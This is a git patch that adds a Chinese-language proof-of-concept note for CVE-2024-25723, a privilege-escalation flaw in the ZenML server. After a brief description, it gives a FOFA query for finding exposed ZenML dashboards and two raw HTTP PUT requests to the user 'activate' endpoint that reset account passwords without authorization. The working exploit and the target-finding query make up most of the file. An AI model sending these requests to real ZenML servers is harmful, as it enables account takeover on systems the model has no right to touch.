From dc64090fa172ec402a26eb6bc213c7a885f2c633 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Sun, 28 Apr 2024 20:23:53 +0800
Subject: [PATCH] =?UTF-8?q?Create=20ZenML=E6=9C=8D=E5=8A=A1=E5=99=A8?=
 =?UTF-8?q?=E8=BF=9C=E7=A8=8B=E6=9D=83=E9=99=90=E6=8F=90=E5=8D=87=E6=BC=8F?=
 =?UTF-8?q?=E6=B4=9E(CVE-2024-25723).md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 ...L服务器远程权限提升漏洞(CVE-2024-25723).md | 38 +++++++++++++++++++
 1 file changed, 38 insertions(+)
 create mode 100644 ZenML服务器远程权限提升漏洞(CVE-2024-25723).md

diff --git a/ZenML服务器远程权限提升漏洞(CVE-2024-25723).md b/ZenML服务器远程权限提升漏洞(CVE-2024-25723).md
new file mode 100644
index 0000000..e349201
--- /dev/null
+++ b/ZenML服务器远程权限提升漏洞(CVE-2024-25723).md
@@ -0,0 +1,38 @@
+## ZenML服务器远程权限提升漏洞(CVE-2024-25723)
+
+ZenML服务器远程权限提升漏洞（CVE-2024-25723）存在于Python的0.46.7之前的ZenML机器学习包中的ZenML服务,漏洞源于/*/{user_name_or_id}/activate REST API 端点允许基于有效用户名和请求正文中的新密码进行访问，可导致未授权用户远程权限提升，可直接重置任意ZenML账户密码。
+
+
+
+## fofa
+```
+title=="ZenML - Dashboard"
+```
+
+## poc
+```
+PUT /api/v1/users/*/activate HTTP/1.1
+Host: 
+User-Agent: python-requests/2.28.1
+Accept-Encoding: gzip, deflate, br
+Accept: */*
+Connection: close
+Content-Type: application/json
+Content-Length: 31
+
+{"password": "Ldwk@20240426"}
+
+
+PUT /api/v1/users/default/activate HTTP/1.1
+Host: 
+User-Agent: python-requests/2.28.1
+Accept-Encoding: gzip, deflate, br
+Accept: */*
+Connection: close
+Content-Type: application/json
+Content-Length: 31
+
+{"password": "Ldwk@20240426"}
+```
+
+![image](https://github.com/wy876/POC/assets/139549762/698ab566-b17e-48c0-954d-1dd21f795405)